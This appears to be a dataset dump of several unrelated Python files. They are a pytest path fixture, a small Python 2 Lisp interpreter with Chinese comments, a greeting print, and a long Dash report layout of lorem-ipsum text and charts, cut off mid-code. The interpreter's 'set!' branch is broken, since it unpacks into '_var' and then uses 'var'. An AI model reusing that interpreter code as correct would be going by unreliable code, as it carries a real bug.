text
stringlengths 2
999k
|
|---|
# -*- coding: utf-8 -*-
import os
import pytest
@pytest.fixture(scope='session')
def absolute_path():
"""Fixture to create full path relative to `contest.py` inside tests."""
def factory(*files):
dirname = os.path.dirname(__file__)
return os.path.join(dirname, *files)
return factory
|
#! /usr/bin/env python
# *-* encoding: utf-8
# ------------------------------------------------------------
# liuyang,mtime: 2012-11-29 15:01:39
# 这是一个python版本的简易lisp解释其的实现.
# 参考代码:http://www.googies.info/articles/lispy.html
# 利用python的特性,可以很方便的写出这个解释器,代码量相当之小
# 但是麻雀虽小,五脏俱全.
# 这个解释器完整的实现了,从输入,解析,环境,计算的过程.对理解编译过程,与语言的设计都有很大帮助.
#-------------------------------------------------------------
# ------------------------ define ENVRONMENT -----------------
class Env(dict):
" An envirionment: a dict of {'var':val} pairs,with an outer Env"
def __init__(self,params=(),args=(),outer=None):
self.update(zip(params,args))
self.outer=outer
def find(self,var):
"Find the innermost Env where var appears"
# 根据词法定界查找正确的环境
return self if var in self else self.outer.find(var)
def add_globals(env):
"add some Scheme standard procedures to an environment"
import math,operator as op
env.update(vars(math)) # add sin,sqrt,...
env.update({
'+' : op.add,
'-' : op.sub,
'*' : op.mul,
'/' : op.div,
'not' : op.not_,
'>' : op.gt,
'<' : op.lt,
'>=' : op.ge,
'<=' : op.le,
'=' : op.eq,
'equal?' : op.eq,
'eq?' : op.is_,
'length' : len,
'cons' : lambda x,y : [x]+y,
'car' : lambda x : x[0],
'cdr' : lambda x : x[1 : ],
'append' : op.add,
'list' : lambda *x : list(x),
'list?' : lambda x : isa(x,list),
'null?' : lambda x : x==[],
'symbol?' : lambda x : isa(x,Symbol)
})
return env
g_env=add_globals(Env())
# ----------------- defube EVAL -----------------------------
def eval(x,env=g_env):
"Evaluate an expression in an envirionment"
if isa(x,Symbol): # variable reference
return env.find(x)[x]
elif not isa(x,list): # constant literal
return x
elif x[0]=='quote': # (quote exp)
(_,exp)=x
return exp
elif x[0]=='if': # (if test coneq alt)
(_,test,conseq,alt)=x
return eval((conseq if eval(test,env) else alt),env)
elif x[0]=='set!': # (set! var exp)
(_var,exp)=x
env.find(var)[var]=eval(exp,env)
elif x[0]=='define': # (define var exp)
(_,var,exp)=x
env[var]=eval(exp,env)
elif x[0]=='lambda': # (lambda (var*) exp)
(_,vars,exp)=x
return lambda *args: eval(exp,Env(vars,args,env))
elif x[0]=='begin': # (begin exp*)
for exp in x[1:]:
val = eval(exp,env)
return val
else: # (proc exp*)
exps = [eval(exp,env) for exp in x]
proc = exps.pop(0)
return proc(*exps)
isa = isinstance
Symbol = str
# ---------------------- Paring Module ----------------------
def atom(token):
"numbers become numbers,every other token is a symbol"
try:
return int(token)
except ValueError:
try:
return float(token)
except ValueError:
return Symbol(token)
def read_from(tokens):
"read an expression from a sequence of tokens"
if len(tokens)==0:
raise SyntaxError("unexpected EOF while reading")
token=tokens.pop(0)
if '('==token:
L=[]
# if first token is ),mean read_form(parsing func should over)
while tokens[0]!=')':
L.append(read_from(tokens))
ret = tokens.pop(0) # pop off )
return L
elif ')'==token:
raise SyntaxError('unexpected ")"')
else:
return atom(token)
def tokenize(s):
"Convert a string into a list of tokens"
return s.replace('(',' ( ').replace(')',' ) ').split()
def read(s):
"Read a Scheme expression from a string"
return read_from(tokenize(s))
parse=read
# ---------------------- string func -----------------------
def to_string(exp):
"convert a Python object back in to a lisp-readable string"
return '('+' '.join(map(to_string,exp))+')' if isa(exp,list) else str(exp)
def repl(prompt='lis.py>> '):
"a prompt read-eval-print loop"
while True:
val = eval(parse(raw_input(prompt)))
if val is not None:
print to_string(val)
# -------------------- main ----------------------------------
def test():
eval(parse('( + 1 2 )'))
if __name__=="__main__":
repl()
|
a = "Hello"
c = "!!! 🙋♂️ "
b = " Rayne"
print(a + b + c)
|
# -*- coding: utf-8 -*-
import dash
import dash_core_components as dcc
import dash_html_components as html
import plotly.graph_objs as go
import dash_table
import pandas as pd
import lorem
import pathlib
# Path
BASE_PATH = pathlib.Path(__file__).parent.resolve()
DATA_PATH = BASE_PATH.joinpath("Data").resolve()
## Read in data
supplyDemand = pd.read_csv(DATA_PATH.joinpath("supplyDemand.csv"))
actualSeasonal = pd.read_csv(DATA_PATH.joinpath("actualSeasonal.csv"))
industrailProd = pd.read_csv(DATA_PATH.joinpath("industrailProd.csv"))
globalMarket = pd.read_csv(DATA_PATH.joinpath("globalMarket.csv"))
oecdCommersial = pd.read_csv(DATA_PATH.joinpath("oecdCommersial.csv"))
wtiPrices = pd.read_csv(DATA_PATH.joinpath("wtiPrices.csv"))
epxEquity = pd.read_csv(DATA_PATH.joinpath("epxEquity.csv"))
chinaSpr = pd.read_csv(DATA_PATH.joinpath("chinaSpr.csv"))
oecdIndustry = pd.read_csv(DATA_PATH.joinpath("oecdIndustry.csv"))
wtiOilprices = pd.read_csv(DATA_PATH.joinpath("wtiOilprices.csv"))
productionCost = pd.read_csv(DATA_PATH.joinpath("productionCost.csv"))
production2015 = pd.read_csv(DATA_PATH.joinpath("production2015.csv"))
energyShare = pd.read_csv(DATA_PATH.joinpath("energyShare.csv"))
adjustedSales = pd.read_csv(DATA_PATH.joinpath("adjustedSales.csv"))
growthGdp = pd.read_csv(DATA_PATH.joinpath("growthGdp.csv"))
# Colours
color_1 = "#003399"
color_2 = "#00ffff"
color_3 = "#002277"
color_b = "#F8F8FF"
app = dash.Dash(__name__)
app.title = "Multipage Report"
server = app.server
app.layout = html.Div(
children=[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
html.Img(
src=app.get_asset_url(
"dash-logo-new.png"
),
className="page-1a",
)
),
html.Div(
[
html.H6("Suscipit nibh"),
html.H5("LOREM IPSUM DOLOR"),
html.H6("Blandit pretium dui"),
],
className="page-1b",
),
],
className="page-1c",
)
],
className="page-1d",
),
html.Div(
[
html.H1(
[
html.Span("03", className="page-1e"),
html.Span("19"),
]
),
html.H6("Suscipit nibh vita"),
],
className="page-1f",
),
],
className="page-1g",
),
html.Div(
[
html.Div(
[
html.H6("Felecia Conroy", className="page-1h"),
html.P("453-264-8591"),
html.P("ilq@w.ipq"),
],
className="page-1i",
),
html.Div(
[
html.H6("Olin Dach", className="page-1h"),
html.P("497-234-2837r"),
html.P("isw@vxogiqyds.umf"),
],
className="page-1i",
),
html.Div(
[
html.H6(
"Dominique Durgan", className="page-1h"
),
html.P("913-823-9541"),
html.P("rgd@hp.xji"),
],
className="page-1i",
),
html.Div(
[
html.H6("Abraham Lemke", className="page-1h"),
html.P("248-865-2687"),
html.P("mc@a.kur"),
],
className="page-1i",
),
html.Div(
[
html.H6("Abraham Lemke", className="page-1h"),
html.P("284-671-3721"),
html.P("j@jdvwnqucm.etv"),
],
className="page-1i",
),
],
className="page-1j",
),
html.Div(
[
html.Div(
[
html.H6(
"Viverra, imperdiet, praesent pellentesque",
className="page-1h",
),
html.P(lorem.paragraph() * 2),
],
className="page-1k",
),
html.Div(
[
html.H6(
"Facilisis mauris parturient, eget vitae",
className="page-1h",
),
html.P(lorem.paragraph() * 2),
],
className="page-1l",
),
html.Div(
[
html.H6(
"A suspendisse mauris aliquam tincidunt hac",
className="page-1h",
),
html.P(lorem.paragraph() * 2),
],
className="page-1m",
),
html.Div(
[
html.H6(
"A elementum lorem dolor aliquam nisi diam",
className="page-1h",
),
html.P(lorem.paragraph()),
],
className="page-1l",
),
],
className="page-1n",
),
],
className="subpage",
)
],
className="page",
),
# Page 2
html.Div(
[
html.Div(
[
html.Div([html.H1("LOREM IPSUM")], className="page-2a"),
html.Div(
[
html.P(lorem.paragraph() * 3, className="page-2b"),
html.P(lorem.paragraph() * 2, className="page-2c"),
html.P(lorem.paragraph() * 2, className="page-2c"),
],
className="page-3",
),
html.Div(
[
html.P(lorem.paragraph() * 2, className="page-2b"),
html.P(lorem.paragraph() * 3, className="page-2c"),
],
className="page-3",
),
],
className="subpage",
)
],
className="page",
),
# Page 3
html.Div(
[
html.Div(
[
html.Div([html.H1("LOREM IPSUM")], className="page-3a"),
html.Div(
[
html.Div(
[
html.Div(
[
html.H6(
"Mauris feugiat quis lobortis nisl sed",
className="page-3b",
),
html.P(
lorem.paragraph(),
className="page-3c",
),
]
),
html.Div(
[
html.Div(
[
html.P(
lorem.paragraph() * 2,
className="page-3d",
)
],
className="page-3e",
),
html.Div(
[
html.P(
lorem.paragraph() * 2,
className="page-3d",
)
],
className="page-3f",
),
html.Div(
[
html.P(
lorem.paragraph(),
className="page-3d",
)
],
className="page-3g",
),
],
className="page-3i",
),
html.Div(
[
html.P(
lorem.paragraph(),
className="page-2c",
)
]
),
],
className="page-3j",
)
]
),
],
className="subpage",
)
],
className="page",
),
# Page 4
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Strong(
"Ultricies fusce vel, ad ultricies enim, at, egestas",
className="page-3h",
),
html.P(
"Quis mauris dolor amet cubilia mattis, finibus magnis lacus",
className="page-3k",
),
],
className="title six columns",
),
html.Div(
[
html.Strong(
"Feugiat justo, aliquam feugiat justo suspendisse leo blandit",
className="page-3h",
),
html.P(
"Praesent, morbi, rhoncus habitant at maximus mauris",
className="page-3k",
),
],
className="title six columns",
),
],
className="thirdPage first row",
)
],
className="page-3l",
),
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=supplyDemand[
"Demand, x"
],
y=supplyDemand[
"Demand, y"
],
hoverinfo="y",
line={
"color": color_1,
"width": 1.5,
},
name="Demand",
),
go.Scatter(
x=supplyDemand[
"Supply, x; Trace 2, x"
],
y=supplyDemand[
"Supply, y; Trace 2, y"
],
hoverinfo="y",
line={
"color": color_2,
"width": 1.5,
},
name="Supply",
),
],
"layout": go.Layout(
height=250,
xaxis={
"range": [
1988,
2015,
],
"showgrid": False,
"showticklabels": True,
"tickangle": -90,
"tickcolor": "#b0b1b2",
"tickfont": {
"family": "Arial",
"size": 9,
},
"tickmode": "linear",
"tickprefix": "1Q",
"ticks": "",
"type": "linear",
"zeroline": True,
"zerolinecolor": "#FFFFFF",
},
yaxis={
"autorange": False,
"linecolor": "#b0b1b2",
"nticks": 9,
"range": [
-3000,
5000,
],
"showgrid": False,
"showline": True,
"tickcolor": "#b0b1b2",
"tickfont": {
"family": "Arial",
"size": 9,
},
"ticks": "outside",
"ticksuffix": " ",
"type": "linear",
"zerolinecolor": "#b0b1b2",
},
margin={
"r": 10,
"t": 5,
"b": 0,
"l": 40,
"pad": 2,
},
hovermode="closest",
legend={
"x": 0.5,
"y": -0.4,
"font": {
"size": 9
},
"orientation": "h",
"xanchor": "center",
"yanchor": "bottom",
},
),
}
)
],
className="page-3m",
)
],
className="six columns",
),
html.Div(
[
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=actualSeasonal[
"Actual, x; Crude ex. US SPR, x; Main Products, x"
],
y=actualSeasonal[
"Actual, y"
],
hoverinfo="y",
line={
"color": "#e41f23",
"width": 2,
},
marker={
"maxdisplayed": 0,
"opacity": 0,
},
name="Actual",
),
go.Scatter(
x=actualSeasonal[
"Seasonal*, x"
],
y=actualSeasonal[
"Seasonal*, y"
],
hoverinfo="y",
line={
"color": color_3,
"dash": "dot",
"width": 1.5,
},
mode="lines",
name="Seasonal*",
),
go.Bar(
x=actualSeasonal[
"Actual, x; Crude ex. US SPR, x; Main Products, x"
],
y=actualSeasonal[
"Crude ex. US SPR, y"
],
marker={
"color": color_2
},
name="Crude ex. US SPR",
),
go.Bar(
x=actualSeasonal[
"Actual, x; Crude ex. US SPR, x; Main Products, x"
],
y=actualSeasonal[
"Main Products, y"
],
marker={
"color": color_1
},
name="Main Products",
),
],
"layout": go.Layout(
barmode="relative",
dragmode="pan",
height=250,
width=310,
hovermode="closest",
legend={
"x": 0.06413301662707839,
"y": -0.05555227415846632,
"bgcolor": "rgba(255, 255, 255, 0)",
"borderwidth": 0,
"font": {
"size": 9
},
"orientation": "h",
"traceorder": "reversed",
},
margin={
"r": 10,
"t": 5,
"b": 0,
"l": 40,
"pad": 2,
},
showlegend=True,
titlefont={
"size": 16
},
xaxis={
"autorange": True,
"range": [
0.5,
8.5,
],
"showgrid": False,
"showline": False,
"tickcolor": "#b0b1b2",
"tickfont": {
"family": "Arial",
"size": 9,
},
"tickmode": "array",
"ticks": "",
"ticktext": [
"Jan-15",
"Feb-15",
"Mar-15",
"Apr-15",
"May-15",
"Jun-15",
"Jul-15",
"Aug-15",
],
"tickvals": [
1,
2,
3,
4,
5,
6,
7,
8,
],
"titlefont": {
"size": 8
},
"type": "linear",
"zeroline": True,
"zerolinecolor": "#FFFFFF",
},
xaxis2={
"autorange": False,
"fixedrange": True,
"overlaying": "x",
"position": 0.38,
"range": [
0.5,
8.5,
],
"showgrid": False,
"showticklabels": False,
"ticks": "",
"ticktext": [
"Jan-15",
"Feb-15",
"Mar-15",
"Apr-15",
"May-15",
"Jun-15",
"Jul-15",
"Aug-15",
],
"tickvals": [
1,
2,
3,
4,
5,
6,
7,
8,
],
},
yaxis={
"autorange": False,
"linecolor": "#b0b1b2",
"nticks": 8,
"range": [
-20,
50,
],
"showgrid": False,
"showline": False,
"tickcolor": "#b0b1b2",
"tickfont": {
"family": "Arial",
"size": 9,
},
"ticks": "outside",
},
),
}
)
],
className="two columns",
)
],
className="page-3m",
),
],
className="thirdPage row",
)
],
className="page-7",
),
html.Div(
[
html.P("Bibendum tellus phasellus turpis sapien:"),
html.P(
lorem.paragraph() * 2,
style={
"border-left": "5px",
"border-left-style": "solid",
"padding": "30px",
"border-left-color": color_1,
"padding-left": "20px",
"border-left-width": "7px",
"background-color": color_b,
},
),
],
style={
"float": "left",
"margin-top": "20px",
"margin-left": "30px",
},
className="eleven columns",
),
html.Div(
[
html.Div(
[
html.Strong(
"Ultricies fusce vel, ad ultricies enim, at, egestas",
style={
"color": color_1,
"padding-top": "100px",
},
),
html.P(
"Quis mauris dolor amet cubilia mattis, finibus magnis lacus",
className="page-3k",
),
],
className="title six columns",
),
html.Div(
[
html.Strong(
"Feugiat justo, aliquam feugiat justo suspendisse leo blandit",
className="page-3h",
),
html.P(
"Praesent, morbi, rhoncus habitant at maximus mauris",
className="page-3k",
),
],
className="title six columns",
),
],
className="thirdPage first row",
style={
"position": "relative",
"top": "20px",
"margin-left": "30px",
},
),
html.Div(
[
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=industrailProd[
"Industrial Production, x"
],
y=industrailProd[
"Industrial Production, y"
],
line={"color": color_2},
mode="lines",
name="Industrial Production",
visible=True,
),
go.Scatter(
x=industrailProd[
"Price (rhs), x"
],
y=industrailProd[
"Price (rhs), y"
],
line={"color": color_1},
mode="lines",
name="Price (rhs)",
visible=True,
yaxis="y2",
),
],
"layout": go.Layout(
annotations=[
{
"x": 0.95,
"y": -0.15,
"arrowhead": 7,
"ax": 0,
"ay": -40,
"font": {"size": 8},
"showarrow": False,
"text": "months after shock",
"xref": "paper",
"yref": "paper",
}
],
autosize=True,
dragmode="pan",
height=250,
width=300,
hovermode="closest",
legend={
"x": 0.0,
"y": 1.2,
"bgcolor": "rgb(255, 255, 255, 0)",
"font": {"size": 9},
},
margin={
"r": 40,
"t": 5,
"b": 10,
"l": 20,
"pad": 0,
},
paper_bgcolor="rgb(0, 0, 0, 0)",
plot_bgcolor="rgb(0, 0, 0, 0)",
showlegend=True,
xaxis={
"autorange": False,
"nticks": 19,
"range": [0.5, 18],
"showgrid": False,
"tickfont": {
"color": "rgb(68, 68, 68)",
"size": 9,
},
"ticks": "",
"type": "linear",
"zeroline": False,
},
yaxis={
"autorange": False,
"linecolor": "rgb(190, 191, 192)",
"mirror": True,
"nticks": 9,
"range": [-0.4, 1.2],
"showgrid": False,
"showline": True,
"side": "left",
"tickfont": {
"color": "rgb(68, 68, 68)",
"size": 9,
},
"ticks": "outside",
"ticksuffix": " ",
"type": "linear",
"zeroline": False,
},
yaxis2={
"anchor": "x",
"autorange": False,
"exponentformat": "e",
"linecolor": "rgb(190, 191, 192)",
"nticks": 9,
"overlaying": "y",
"range": [-0.1, 0.3],
"showgrid": False,
"side": "right",
"tickfont": {"size": 9},
"tickprefix": " ",
"ticks": "outside",
"type": "linear",
"zerolinecolor": "rgb(190, 191, 192)",
},
),
}
)
],
className="six columns",
style={"height": "250px"},
),
html.Div(
[
html.Div(
[
dash_table.DataTable(
data=growthGdp.to_dict("records"),
columns=[
{"id": c, "name": c}
for c in growthGdp.columns
],
style_data_conditional=[
{
"if": {"row_index": "odd"},
"backgroundColor": color_b,
},
{
"if": {"column_id": ""},
"backgroundColor": color_2,
"color": "white",
},
],
style_header={
"backgroundColor": color_1,
"fontWeight": "bold",
"color": "white",
},
fixed_rows={"headers": True},
style_cell={"width": "70px"},
)
],
className="exhibit six columns",
)
],
className="page-2c",
),
],
className="page-7",
),
],
className="subpage",
)
],
className="page",
),
# Page 5
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[html.P(lorem.paragraph())],
className="page-5",
),
html.Div(
[html.P(lorem.paragraph())],
className="page-5a",
),
html.Div(
[html.P(lorem.paragraph())],
className="page-5b",
),
],
className="page-5c",
)
],
className="eleven columns row",
),
html.Div(
[html.P(lorem.paragraph(), className="page-5f")],
className="twelve columns row",
),
html.Div(
[
html.Div(
[
html.Div(
[
html.Strong(
"Ultricies fusce vel, ad ultricies enim, at, egestas",
className="page-3h",
),
html.P(
"Quis mauris dolor amet cubilia mattis, finibus magnis lacus",
className="page-3k",
),
],
className="title six columns",
),
html.Div(
[
html.Strong(
"Feugiat justo, aliquam feugiat justo suspendisse leo blandit",
className="page-3h",
),
html.P(
"Praesent, morbi, rhoncus habitant at maximus mauris",
className="page-3k",
),
],
className="title six columns",
),
],
className="thirdPage first row",
)
],
className="page-5g",
),
html.Div(
[
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Bar(
x=globalMarket["x"],
y=globalMarket["y"],
marker={"color": color_1},
name="Global market imbalance",
)
],
"layout": go.Layout(
autosize=True,
bargap=0.63,
dragmode="pan",
height=250,
width=320,
hovermode="closest",
legend={
"x": 0.0006061953460797935,
"y": -0.31665440684852813,
"bgcolor": "rgb(255, 255, 255, 0)",
"borderwidth": 0,
"font": {"size": 9},
"orientation": "h",
},
margin={
"r": 40,
"t": 5,
"b": 10,
"l": 20,
"pad": 0,
},
showlegend=True,
title="Click to enter Plot title",
xaxis={
"autorange": False,
"nticks": 18,
"range": [-0.5, 15.5],
"showgrid": False,
"tickfont": {"size": 9},
"tickmode": "linear",
"ticks": "",
"title": "Click to enter X axis title",
"type": "category",
},
yaxis={
"autorange": True,
"linecolor": "rgb(176, 177, 178)",
"nticks": 10,
"range": [
-1283.8982436029166,
3012.5614936594166,
],
"showgrid": False,
"showline": True,
"tickfont": {"size": 9},
"ticks": "outside",
"title": "",
"type": "linear",
"zeroline": True,
"zerolinecolor": "rgb(176, 177, 178)",
},
),
}
)
],
className="six columns",
),
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=oecdCommersial[
"OECD commercial ex. US NGL & other, x"
],
y=oecdCommersial[
"OECD commercial ex. US NGL & other, y"
],
line={"color": color_1},
mode="lines",
name="OECD commercial ex. US NGL & other",
),
go.Scatter(
x=oecdCommersial[
"Seasonal (2000-2014), x"
],
y=oecdCommersial[
"Seasonal (2000-2014), y"
],
line={"color": color_2},
mode="lines",
name="Seasonal (2000-2014)",
),
],
"layout": go.Layout(
autosize=True,
bargap=0.63,
dragmode="pan",
height=250,
width=320,
hovermode="closest",
legend={
"x": 0.0006061953460797935,
"y": -0.31665440684852813,
"bgcolor": "rgb(255, 255, 255, 0)",
"borderwidth": 0,
"font": {"size": 9},
"orientation": "h",
},
margin={
"r": 40,
"t": 5,
"b": 10,
"l": 40,
"pad": 0,
},
showlegend=True,
title="Click to enter Plot title",
xaxis={
"autorange": False,
"linecolor": "rgb(190, 191, 192)",
"nticks": 17,
"range": [-0.5, 16],
"showgrid": False,
"showline": False,
"tickfont": {"size": 9},
"ticks": "",
"ticksuffix": " ",
"title": "",
"type": "category",
"zeroline": False,
"zerolinecolor": "rgb(190, 191, 192)",
},
yaxis={
"autorange": False,
"linecolor": "rgb(190, 191, 192)",
"nticks": 10,
"range": [-800, 1000],
"showgrid": False,
"showline": True,
"tickfont": {"size": 10},
"ticks": "outside",
"ticksuffix": " ",
"title": "",
"type": "linear",
"zeroline": True,
"zerolinecolor": "rgb(190, 191, 192)",
},
),
}
)
],
className="six columns",
),
],
className="page-1i",
),
],
className="subpage",
)
],
className="page",
),
# Page 6
html.Div(
[
html.Div(
[
html.Div([html.P(lorem.paragraph() * 3)], className="page-6"),
html.Div(
[
html.Div(
[
html.Div(
[
html.Strong(
"At velit pharetra ac fusce sit dictum pellentesque",
className="eleven columns",
)
],
className="page-3h",
),
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=wtiPrices[
"WTI Prices, x"
],
y=wtiPrices[
"WTI Prices, y"
],
line={
"color": color_1,
"dash": "solid",
},
mode="lines",
name="WTI Prices",
),
go.Scatter(
x=wtiPrices[
"Sep-15 forecast, x"
],
y=wtiPrices[
"Sep-15 forecast, y"
],
line={
"color": "rgb(228, 31, 35)"
},
mode="lines",
name="Sep-15 forecast",
),
go.Scatter(
x=wtiPrices[
"Forward, x"
],
y=wtiPrices[
"Forward, y"
],
line={
"color": color_2,
"dash": "solid",
},
mode="lines",
name="Forward",
),
go.Scatter(
x=wtiPrices[
"May-15 forecast, x"
],
y=wtiPrices[
"May-15 forecast, y"
],
line={
"color": color_3,
"dash": "solid",
},
mode="lines",
name="Forward",
),
],
"layout": go.Layout(
height=250,
hovermode="closest",
legend={
"x": 0.16039179104479998,
"y": 1,
"bgcolor": "rgb(255, 255, 255, 0)",
"bordercolor": "rgba(68, 68, 68, 0)",
"font": {
"color": "rgb(68, 68, 68)",
"size": 10,
},
"orientation": "h",
"traceorder": "normal",
},
margin={
"r": 40,
"t": 5,
"b": 30,
"l": 40,
},
showlegend=True,
xaxis={
"autorange": False,
"linecolor": "rgb(130, 132, 134)",
"mirror": False,
"nticks": 14,
"range": [0, 14],
"showgrid": False,
"showline": True,
"tickfont": {
"color": "rgb(68, 68, 68)",
"size": 9,
},
"ticks": "outside",
"ticktext": [
"Sep-14",
"Nov-14",
"Jan-15",
"Mar-15",
"May-15",
"Jul-15",
"Sep-15",
"Nov-15",
"Jan-16",
"Mar-16",
"May-16",
"Jul-16",
"Sept-16",
"Nov-16",
],
"tickvals": [
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
],
"title": "",
"type": "linear",
"zeroline": False,
"zerolinecolor": "rgb(130, 132, 134)",
},
yaxis={
"autorange": False,
"linecolor": "rgb(130, 132, 134)",
"nticks": 8,
"range": [30, 100],
"showline": True,
"tickfont": {
"color": "rgb(68, 68, 68)",
"size": 10,
},
"ticks": "outside",
"ticksuffix": " ",
"title": "",
"type": "linear",
"zeroline": True,
"zerolinecolor": "rgb(130, 132, 134)",
},
),
}
)
]
),
],
className="eleven columns",
)
],
className="page-2c",
),
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Strong(
"At velit pharetra ac fusce sit dictum pellentesque",
className="page-3h",
),
html.P(
lorem.paragraph() * 3,
className="page-2c",
),
],
className="page-6a",
)
],
className="five columns",
),
html.Div(
[
html.Div(
[
html.Strong(
"Vehicula elementum congue penatibus massa, eu sed",
className="page-6d",
),
html.Div(
html.Img(
src=app.get_asset_url(
"DBkxRT2.png"
),
className="page-6b",
)
),
],
className="page-6c",
)
],
className="six columns",
),
],
className="thirdPage row",
)
],
className="page-6e",
),
],
className="subpage",
)
],
className="page",
),
# Page 7
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.P(
lorem.paragraph() * 3, className="page-7a"
),
html.P(
lorem.paragraph() * 2, className="page-7a"
),
html.P(lorem.paragraph(), className="page-7a"),
html.P(lorem.paragraph(), className="page-7a"),
],
className="page-7b",
)
],
className="six columns",
),
html.Div(
[
html.Div(
[
html.Div(
[
html.Strong(
"Vehicula elementum congue penatibus massa, eu sed sed dolor",
className="page-3h",
),
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Bar(
x=[
"AAA",
"AA",
"A",
"BBB",
"BB",
"B",
"CCC",
],
y=[
"1497",
"976",
"1016",
"1739",
"993",
"545",
"31",
],
marker={
"color": color_1
},
name="y",
)
],
"layout": go.Layout(
height=300,
hovermode="closest",
autosize=True,
bargap=0.75,
legend={
"x": 0.16039179104479998,
"y": -0.2720578174979476,
"bgcolor": "rgb(255, 255, 255, 0)",
"bordercolor": "rgba(68, 68, 68, 0)",
"font": {
"color": "rgb(68, 68, 68)",
"size": 10,
},
"orientation": "h",
"traceorder": "normal",
},
margin={
"r": 0,
"t": 10,
"b": 30,
"l": 60,
},
xaxis={
"autorange": False,
"nticks": 10,
"range": [
-0.5,
6.5,
],
"tickfont": {
"size": 9
},
"ticks": "",
"title": "",
"type": "category",
},
yaxis={
"autorange": False,
"dtick": 250,
"nticks": 9,
"range": [
0,
2250,
],
"showgrid": False,
"showline": True,
"tickfont": {
"size": 9
},
"ticks": "outside",
"ticksuffix": " ",
"title": "2015E production by rating (mboe)<br><br>",
"titlefont": {
"size": 9
},
"type": "linear",
"zeroline": True,
},
),
}
)
]
),
],
className="page-7c",
),
html.Div(
[
html.Strong(
"At velit pharetra ac fusce sit dictum pellentesque, dictumst",
className="page-3h",
),
html.Div(
dcc.Graph(
figure={
"data": [
go.Scatter(
x=epxEquity[
"EPX equity sector, x"
],
y=epxEquity[
"EPX equity sector, y"
],
line={
"color": color_1,
"width": 2,
},
mode="lines",
name="EPX equity sector",
visible=True,
),
go.Scatter(
x=epxEquity[
"WTI 2-yr swap, x"
],
y=epxEquity[
"WTI 2-yr swap, y"
],
line={
"color": color_2,
"width": 2,
},
mode="lines",
name="WTI 2-yr swap",
visible=True,
),
go.Scatter(
x=epxEquity[
"HY energy spread ratio (rhs, inverted), x"
],
y=epxEquity[
"HY energy spread ratio (rhs, inverted), y"
],
line={
"color": "red",
"width": 2,
},
mode="lines",
name="HY energy spread ratio (rhs, inverted)",
visible=True,
),
],
"layout": go.Layout(
height=300,
autosize=True,
hovermode="closest",
legend={
"x": 0.008033242860512229,
"y": -0.3007047167087806,
"bgcolor": "rgba(255, 255, 255, 0)",
"font": {
"color": "rgb(68, 68, 68)",
"size": 9,
},
"orientation": "h",
},
margin={
"r": 30,
"t": 10,
"b": 20,
"l": 30,
},
showlegend=True,
xaxis={
"autorange": False,
"linecolor": "rgb(130, 132, 134)",
"linewidth": 1,
"nticks": 14,
"range": [0, 12],
"showgrid": False,
"showline": True,
"tickfont": {
"color": "rgb(68, 68, 68)",
"size": 9,
},
"ticks": "outside",
"ticktext": [
"Sep-14",
"Oct-14",
"Nov-14",
"Dec-14",
"Jan-15",
"Feb-15",
"Mar-15",
"Apr-15",
"May-15",
"Jun-15",
"July-15",
"Aug-15",
],
"tickvals": [
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
],
"title": "",
"type": "linear",
"zeroline": False,
},
yaxis={
"autorange": False,
"linecolor": "rgb(130, 132, 134)",
"nticks": 8,
"range": [30, 100],
"showgrid": False,
"showline": True,
"tickfont": {
"size": 9
},
"ticks": "outside",
"title": "",
"type": "linear",
"zeroline": True,
},
yaxis2={
"anchor": "x",
"linecolor": "rgb(130, 132, 134)",
"nticks": 10,
"overlaying": "y",
"range": [1.8, 0.9],
"showgrid": False,
"showline": True,
"side": "right",
"tickfont": {
"size": 9
},
"ticks": "outside",
"title": "Click to enter Y axis title",
"type": "linear",
"zeroline": False,
},
),
}
)
),
],
className="page-1i",
),
],
className="twelve columns",
)
],
className="page-7d",
),
],
className="subpage",
)
],
className="page",
),
# Page 8
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.H6(
"Aliquet ut mauris nostra habitant egestas, massa vulputate. Magnis nullam leo eget ullamcorper lacus congue laoreet ex sed",
className="page-3b",
),
html.P(
lorem.paragraph(),
className="page-3c",
),
html.P(
lorem.paragraph(),
className="page-8a",
),
]
),
html.Div(
[
html.Div(
[
html.P(
lorem.paragraph()
* 2,
className="page-3d",
)
],
className="page-3e",
),
html.Div(
[
html.P(
lorem.paragraph()
* 2,
className="page-3d",
)
],
className="page-3f",
),
html.Div(
[
html.P(
lorem.paragraph()
* 2,
className="page-3d",
)
],
className="page-3g",
),
],
className="page-3i",
),
html.Div(
[
html.P(
lorem.paragraph(),
className="page-2c",
)
]
),
],
className="nine columns",
)
],
className="page-8b",
)
],
className="subpage",
)
],
className="page-8c",
)
],
className="page",
),
# Page 9
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.P(
"Aenean felis et libero nullam pretium quis est in sit. Commodo nec ante aenean a. Commodo at facilisis vestibulum cursus elementum nascetur et, placerat class aliquam convallis porttitor accumsan. Ultricies sed laoreet eleifend maximus venenatis",
className="page-3h",
),
html.Strong(
"Congue nisl iaculis interdum cubilia maximus"
),
html.Div(
[
html.Img(
src=app.get_asset_url(
"wX5mQYn.png"
),
className="exhibit eleven columns",
)
],
className="page-9a",
),
],
className="page-7a",
),
html.Div(
[
html.P(
"Id nulla sollicitudin taciti ac tempus amet ligula accumsan. Elementum, nullam dui ligula ut. Adipiscing sed ultricies ut vitae augue etiam nostra nibh.",
className="page-3h",
),
html.Strong(
"Convallis et eu habitant leo leo luctus venenatis"
),
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=chinaSpr[
"OECD commercial ex. US NGL & other, x"
],
y=chinaSpr[
"OECD commercial ex. US NGL & other, y"
],
line={
